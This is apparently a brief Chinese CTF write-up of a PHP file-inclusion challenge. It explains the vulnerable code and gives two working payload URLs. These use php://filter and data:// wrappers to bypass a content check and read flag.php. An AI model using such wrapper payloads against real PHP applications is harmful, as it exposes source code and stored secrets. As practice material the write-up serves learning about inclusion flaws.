上来就是一段代码审计,浅分析一下
加载 flag.php 文件(可能包含敏感信息)。
高亮显示当前文件的源码。
检查用户是否传递了 file1 和 file2 参数。
检查 file1 和 file2 是否为空。
读取 file2 文件的内容,检查是否等于 "hello ctf"。
如果条件满足,加载 file1 指定的文件并执行。
这里第一时间想到用伪协议读取flag文件
/?file1=php://filter/convert.base64-encode/resource=flag.php&file2=data://text/plain,hello%20ctfPHP-伪协议_php伪协议读取文件-优快云博客php为协议推荐这篇
这里用的是base64加密,也可直接用utf-8,出现flag
/?file1=php://filter/convert.iconv.UTF-8*.UTF-32LE*/resource=flag.php&file2=data://text/plain,hello%20ctf
扫一扫
724
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
